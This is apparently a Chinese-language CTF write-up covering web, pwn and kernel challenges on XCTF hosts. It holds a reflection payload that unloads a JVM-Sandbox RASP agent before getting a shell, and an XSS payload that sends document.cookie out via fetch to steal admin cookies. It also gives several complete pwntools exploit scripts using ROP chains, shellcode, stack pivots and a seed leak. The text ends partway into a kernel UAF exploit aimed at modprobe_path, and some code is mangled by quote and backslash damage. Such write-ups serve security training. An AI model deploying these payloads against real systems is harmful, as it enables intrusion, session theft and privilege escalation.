open(“agent.jar”, “ab+”) as f: for i in data: f.write(base64.b64decode(i))
|
对agent.jar进行审计,发现源JVM-SANDBOX项目,发现在启动类中有一个uninstall方法,用来指定删除模块。当前RASP功能默认模块是default,于是想试试能不能直接这么卸载RASP,payload如下,之后就可以直接开始执行命令
JSON try { // 使用类加载器动态加载 AgentLauncher 类 Class agentLauncherClass = Class.forName(“com.alibaba.jvm.sandbox.agent.AgentLauncher”); // 获取 uninstall 方法 System.out.println(agentLauncherClass); String className =Thread.currentThread().getStackTrace()[1].getClassName(); System.out.println(“当前类名: ” + className); java.lang.reflect.Method uninstallMethod = agentLauncherClass.getDeclaredMethod(“uninstall”, String.class); uninstallMethod.invoke(null, “default”); System.out.println(“Sandbox 卸载成功!”); } catch (Exception e) { System.err.println(“调用卸载方法时出错: ” + e.getMessage()); e.printStackTrace(); }
|
测试了半天的回显,发现可以直接bash弹shell了
Spreader
Content分两次上传
Python <> fetch(‘/store’,{method:’POST’,headers:{‘Content-Type’:’application/x-www-form-urlencoded’},body:encodeURIComponent(document.cookie)});/*<br><br><br>*/
|
拿完privileged的Cookies,再以privileged的身份上传上述的Payload,再拿admin的Cookies。
Pwn:
qwen
pwn1:
栈溢出修改error_trigger函数指针为后门
触发error到后门
通过open(“/proc/self/maps”),泄露libc和pie
回到主程序,继续修改函数指针,观察劫持控制流的现场,并抬栈到buf,打rop
Python from pwn import * context(os=’linux’, arch=’amd64′, log_level=’debug’) while True: #p = process(‘./pwn’) elf = ELF(‘./pwn’) p =remote(‘pwn-848a8a75eb.challenge.xctf.org.cn’, 9999,ssl=True) libc = ELF(‘./libc-2.27.so’) p.sendlineafter(‘请输入下棋的位置(行 列):’,’0 0′) p.sendlineafter(‘请输入下棋的位置(行 列):’,’0 1′) p.sendlineafter(‘请输入下棋的位置(行 列):’,’0 2′) p.sendlineafter(‘请输入下棋的位置(行 列):’,’0 3′) p.sendlineafter(‘请输入下棋的位置(行 列):’,’0 4′) p.sendafter(‘Is there anything you want to say?’,b’a’*0x8+b’x08’b’x15′) p.sendlineafter(‘Do you want to end the game [Y/N]’,’N’) try: p.sendlineafter(‘请输入下棋的位置(行 列):’,’14 15′) p.sendlineafter(‘Please enter the administrator key’,’1804289383′) sleep(0.2) p.sendline(‘/proc/self/maps’) p.recvuntil(‘The debugging information is as follows >>n’) pie = int(p.recvline()[:12],16) print(‘[*] pie = ‘,hex(pie)) pop_rdi_ret =pie+0x19b3 leave_ret = pie + 0x1944 ret = pie +0x1945 call_read = pie +0x18ad p.recvline() p.recvline() libc_base = int(p.recvline()[:12],16) add_rsp_0x68_ret = libc_base + 0x000000000010fc5e system_addr = libc_base + libc.symbols[‘system’] binsh_addr = libc_base + next(libc.search(‘/bin/sh’)) print(‘[*] libc = ‘,hex(libc_base)) ”’ 0x4f2a5 execve(“/bin/sh”, rsp+0x40, environ) constraints: rsp & 0xf == 0 rcx == NULL 0x4f302 execve(“/bin/sh”, rsp+0x40, environ) constraints: [rsp+0x40] == NULL 0x10a2fc execve(“/bin/sh”, rsp+0x70, environ) constraints: [rsp+0x70] == NULL ”’ ogg = libc_base + 0x4f2a5 p.sendlineafter(‘请输入下棋的位置(行 列):’,’0 0′) p.sendlineafter(‘请输入下棋的位置(行 列):’,’0 1′) p.sendlineafter(‘请输入下棋的位置(行 列):’,’0 2′) p.sendlineafter(‘请输入下棋的位置(行 列):’,’0 3′) p.sendlineafter(‘请输入下棋的位置(行 列):’,’0 4′) p.sendafter(‘Is there anything you want to say?’,b’a’*0x8+p64(add_rsp_0x68_ret)+p64(0xdeadbeef)+p64(pop_rdi_ret)+p64(binsh_addr) + p64(system_addr)) p.sendlineafter(‘Do you want to end the game [Y/N]’,’N’) #gdb.attach(p,’b *$rebase(0x1022)nc’) p.sendlineafter(‘请输入下棋的位置(行 列):’,’14 15′) break except: p.close() continue p.sendline(‘cd home/ctf/’) p.interactive()
|
pwn2:
一个压缩程序,可以将flag打包成可读文件,打包后直接cat即可
base64解码过后可以得到flag
ezcode
先通过mprotect修改将shellcode地址权限改成7,再通过jmp回到syscall,并提前布置好参数来实现read,读0xf大小
通过第一次read,布置好第二次read,并jmp跳转过去,第二次read长度可控
最后orw
Python from pwn import * import json context(os=’linux’, arch=’amd64′, log_level=’debug’) p = process(‘./pwn’) elf = ELF(‘./pwn’) #p = remote(“pwn-6bc8a8d329.challenge.xctf.org.cn”, 9999, ssl=True) ”’ //mprotect(0x9998000, _ ,7) 13 bytes mov ax,0xa shl edi,12 mov dx, 0xf syscall //read 9 bytes xor edi,edi shl esi,12 xor eax,eax jmp short // 跳转回上一个 syscall ”’ gdb.attach(p,’b *$rebase(0x15e0)nb *$rebase(0x18a6)nc’) payload = ’66b80a00c1e70c66ba0f000f05′ payload += ’31ffc1e60c31c0ebf5′ shellcode = ‘{“shellcode”: “‘ shellcode += payload shellcode += ‘”}’ p.sendlineafter(‘ input:’,shellcode) print(“[*] length is “,hex(len(payload))) ”’ xor eax, eax mov dx, 0xf0 syscall ”’ p.send(b’1xc0fxbaxf0x00x0fx05′.ljust(0xd, b’x90′) + b’xebxf1′) payload = shellcraft.open(‘/flag’) + shellcraft.read(‘rax’, 0x9998f00, 0x100) + shellcraft.write(1, 0x9998f00, 0x100) p.sendline(b’a’ * 8 + asm(‘shl esp, 12; add esp, 0x200’) + asm(payload)) p.interactive()
|
signin_revenge
vuln函数中存在0x30字节的栈溢出,第一次利用栈溢出劫持控制流到puts函数泄露libc地址,并回到vuln;第二次利用栈溢出劫持控制流到gets,向data段读入字符串和ROP并最终回到vuln;第三次利用栈溢出劫持控制流、使用ROP:pop_rbp+data段地址+leave_ret实现栈迁移,最终orw读出flag;
Python from pwn import * import sys file = “./vuln” if len(sys.argv) == 1 or sys.argv[1] == ‘l’: sh = process(file) elif sys.argv[1] == ‘r’: sh = remote(“pwn-6fc638b866.challenge.xctf.org.cn”, 9999, ssl=True) elf = ELF(file) def ru(string): sh.recvuntil(string) def dbg(): if len(sys.argv) > 1 and sys.argv[1] == ‘r’: return gdb.attach(sh) pause() def sl(content): sh.sendline(content) def itr(): sh.interactive() context.log_level = ‘debug’ def get_heap(): res = 0 res = u64(sh.recvuntil(“x55”, timeout=0.2)[-6:].ljust(8, b‘x00’)) if res == 0: res = u64(sh.recvuntil(“x56”, timeout=0.2)[-6:].ljust(8, b‘x00’)) return res def get_libc(): res = 0 res = u64(sh.recvuntil(“x7f”, timeout=0.2)[-6:].ljust(8, b‘x00’)) if res == 0: res = u64(sh.recvuntil(“x7e”, timeout=0.2)[-6:].ljust(8, b‘x00’)) return res def get_tcache(): res = u64(sh.recvuntil(“x05”)[-5:].ljust(8, b“x00”)) return res def func(): pop_rdi = 0x0000000000401393 puts_got = elf.got[‘puts’] puts_plt = elf.plt[‘puts’] vuln = 0x4012C0 #ru(“lets move and pwn!”) pay = b‘a’*0x108 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln) sl(pay) puts = u64(sh.recvuntil(“x7f”)[-6:].ljust(8, b‘x00’)) print(“puts :”, hex(puts)) libc = ELF(“./libc.so.6”) base = puts – libc.sym[‘puts’] print(“base :”, hex(base)) _open = base + libc.sym[‘open’] pop_rsi = base + 0x000000000002601f flag = base + 0x0000000000012efb print(“flag :”, hex(flag)) pop_rdx = base + 0x0000000000142c92 pay = b‘a’*0x108+p64(pop_rsi)+p64(0x404088)+p64(elf.plt[‘read’])+p64(vuln) sl(pay) pay = b“flag”+b‘x00’*4 pay += p64(pop_rdi) + p64(0x404088) + p64(pop_rsi) + p64(0) + p64(_open) pay += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(0x404088+0x200) + p64(pop_rdx) + p64(0x100) + p64(elf.plt[‘read’]) pay += p64(pop_rdi) + p64(0x404088+0x200) + p64(puts_plt) sl(pay) leave_ret = 0x4012EE pop_rbp = 0x000000000040117d dbg() pay = b‘a’*0x108+p64(pop_rbp) + p64(0x404088) + p64(leave_ret) sl(pay) sh.interactive() if __name__ == “__main__”: func()
|
signin
首先是输入name,然后有一个关于随机数的校验,由于输入name存在溢出且输入之后存在一个printf %s的输出反馈,可以利用这个泄露随机数的时间种子,从而绕过;然后进入到主程序是一个菜单堆,且add功能中存在一个和signin_revenge中vuln函数逻辑一样的O_o漏洞函数,利用方法完全一致,不再赘述;
Python from pwn import * import sys from ctypes import CDLL file = “./vuln” if len(sys.argv) == 1 or sys.argv[1] == ‘l’: sh = process(file) elif sys.argv[1] == ‘r’: sh = remote(“pwn-aaafe75338.challenge.xctf.org.cn”, 9999, ssl=True) elf = ELF(file) def ru(string): sh.recvuntil(string) def dbg(): if len(sys.argv) > 1 and sys.argv[1] == ‘r’: return gdb.attach(sh) pause() def sl(content): sh.sendline(content) def itr(): sh.interactive() context.log_level = ‘debug’ def get_heap(): res = 0 res = u64(sh.recvuntil(“x55”, timeout=0.2)[-6:].ljust(8, b‘x00’)) if res == 0: res = u64(sh.recvuntil(“x56”, timeout=0.2)[-6:].ljust(8, b‘x00’)) return res def get_libc(): res = 0 res = u64(sh.recvuntil(“x7f”, timeout=0.2)[-6:].ljust(8, b‘x00’)) if res == 0: res = u64(sh.recvuntil(“x7e”, timeout=0.2)[-6:].ljust(8, b‘x00’)) return res def get_tcache(): res = u64(sh.recvuntil(“x05”)[-5:].ljust(8, b“x00”)) return res def attack(): pop_rdi = 0x0000000000401893 puts_got = elf.got[‘puts’] puts_plt = elf.plt[‘puts’] vuln = 0x4013C0 #ru(“lets move and pwn!”) pay = b‘a’*0x108 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln) sl(pay) puts = u64(sh.recvuntil(“x7f”)[-6:].ljust(8, b‘x00’)) print(“puts :”, hex(puts)) libc = ELF(“./libc.so.6”) base = puts – libc.sym[‘puts’] print(“base :”, hex(base)) _open = base + libc.sym[‘open’] pop_rsi = base + 0x000000000002601f pop_rdx = base + 0x0000000000142c92 #dbg() #pay = b’a’*0x108+p64(pop_rsi)+p64(0x404108)+p64(elf.plt[‘read’])+p64(vuln) pay = b‘a’*0x108+p64(pop_rdi)+p64(0x404108)+p64(base+libc.sym[‘gets’])+p64(vuln) sl(pay) pay = b“flag”.ljust(8, b‘x00’) pay += p64(pop_rdi) + p64(0x404108) + p64(pop_rsi) + p64(0) + p64(_open) pay += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(0x404108+0x200) + p64(pop_rdx) + p64(0x100) + p64(elf.plt[‘read’]) pay += p64(pop_rdi) + p64(0x404108+0x200) + p64(puts_plt) + p64(vuln) pay += p64(pop_rdi) + p64(1) + p64(0x404108+0x200) + p64(pop_rdx) + p64(0x100) + p64(base+libc.sym[‘write’])+p64(vuln) sl(pay) leave_ret = 0x4013EE pop_rbp = 0x000000000040127d pay = b‘a’*0x108+p64(pop_rbp) + p64(0x404108) + p64(leave_ret) sl(pay) def func(): h = CDLL(“./libc.so.6”) sh.send(“n”*(0x16-0x8)) ru(“User Name”) ru(“n”*(0x16-0x8)) seed = u32(sh.recv(4)) print(“seed :”, hex(seed)) h.srand(seed) for _ in range(100): num = h.rand() num = num % 100 + 1 #print(“rand :”, num) ru(“Input the authentication code:”) sh.send(p32(num)) ru(“>>”) sh.send(p32(1)) ru(“Index:”) sh.send(p32(1)) ru(“Note”) sh.send(“a”*0x100) attack() sh.interactive() if __name__ == “__main__”: func()
|
ker
kmalloc-64的UAF,(两次free、一次edit)存在cg隔离,因此使用内核密钥+pg_vec,首先分配该结构并释放,然后利用内核密钥占据该obj,之后再次释放,然后使用pg_vec占位,此时内核密钥被覆盖,长度被改写,通过越界读+爆破泄露内核地址,然后利用edit功能修改pg_vec为modprobe_path所在页,mmap映射,修改modprobe_path的内容,触发错误以在特权下修改flag权限,最终读出flag;
C #define _GNU_SOURCE #include #include #include #include #include #include #include #include //CPU绑核 void bindCore(int core) { cpu_set_t cpu_set; CPU_ZERO(&cpu_set); CPU_SET(core, &cpu_set); sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set); printf(“ |